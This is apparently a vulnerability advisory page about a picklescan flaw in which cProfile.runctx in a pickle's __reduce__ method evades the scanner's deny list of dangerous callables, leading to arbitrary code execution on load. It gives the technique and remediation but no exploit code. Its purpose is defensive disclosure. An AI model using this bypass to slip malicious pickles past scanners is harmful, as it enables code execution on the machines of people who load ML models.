EUVD-2025-210294
GHSA-fcqg-3mwf-cfcf
Severity by source
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Malicious file is network-distributable (AV:N), exploitation is straightforward once delivered (AC:L), no auth required (PR:N), but the victim must load the file (UI:R); pickle RCE yields full C/I/A impact.
Primary rating from Vendor (VulnCheck).
CVSS VectorVendor: VulnCheck
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
3DescriptionCVE.org
picklescan before 0.0.30 fails to detect cProfile.runctx function calls in pickle file reduce methods, allowing attackers to execute arbitrary code. Malicious pickle files bypass picklescan detection and execute remote code when loaded via pickle.load().
AnalysisAI
Detection bypass in picklescan versions before 0.0.30 allows malicious pickle files to evade security scanning by using cProfile.runctx in __reduce__ methods, leading to arbitrary code execution when the file is loaded via pickle.load(). The flaw undermines the core purpose of picklescan as a defensive tool for ML model security and was reported by VulnCheck with a published proof-of-concept in the GitHub Security Advisory. No public exploit identified at time of analysis as a weaponized in-the-wild attack, but PoC code is published in the GHSA.
Technical ContextAI
picklescan is a Python library (cpe:2.3:a:picklescan:picklescan) designed to inspect pickle files - particularly within PyTorch model artifacts - for dangerous opcodes and function calls that would lead to code execution upon deserialization. The vulnerability is a classic CWE-502 (Deserialization of Untrusted Data) detection gap: picklescan maintains an allow/deny list of known dangerous callables (os.system, subprocess.Popen, eval, exec, etc.) invoked through pickle's __reduce__ protocol, but the built-in cProfile.runctx function was missing from this list. Because cProfile.runctx internally calls exec() on its first argument, an attacker can use it as a proxy to execute arbitrary code that the scanner never flags.
RemediationAI
Vendor-released patch: upgrade picklescan to 0.0.30 or later (pip install --upgrade 'picklescan>=0.0.30'); the fix commit is https://github.com/mmaitre314/picklescan/commit/1931c2d04eaca8d20597705ff39cab78ba364e4b and is documented in the GHSA at https://github.com/mmaitre314/picklescan/security/advisories/GHSA-9w88-8rmg-7g2p. Where immediate upgrade is not possible, refuse to call pickle.load() on any file from an untrusted source regardless of picklescan's verdict, switch model loading to safer formats such as Safetensors (which side-steps pickle entirely at the cost of not supporting arbitrary Python objects), or sandbox model loading in an isolated container/process with no network or filesystem write privileges so any executed payload has minimal blast radius. Treat picklescan output as advisory only until upgraded, and audit any pickle files ingested between the introduction of cProfile.runctx-bearing payloads and the patch date.
More from same product – last 7 days
Remote code execution against users of picklescan versions prior to 1.0.4 is achievable by smuggling any blocked functio
Arbitrary code execution in picklescan versions prior to 1.0.1 allows attackers to bypass the scanner's malicious pickle
Arbitrary code execution in picklescan before 0.0.33 allows remote attackers to bypass the scanner's malicious-pickle de
Arbitrary file write in picklescan before 0.0.33 lets attackers bypass the tool's dangerous-call blocklist by abusing di
Remote code execution in picklescan before 0.0.33 enables attackers to bypass the tool's malicious-pickle detection by s
Share
External POC / Exploit Code
Leaving vuln.today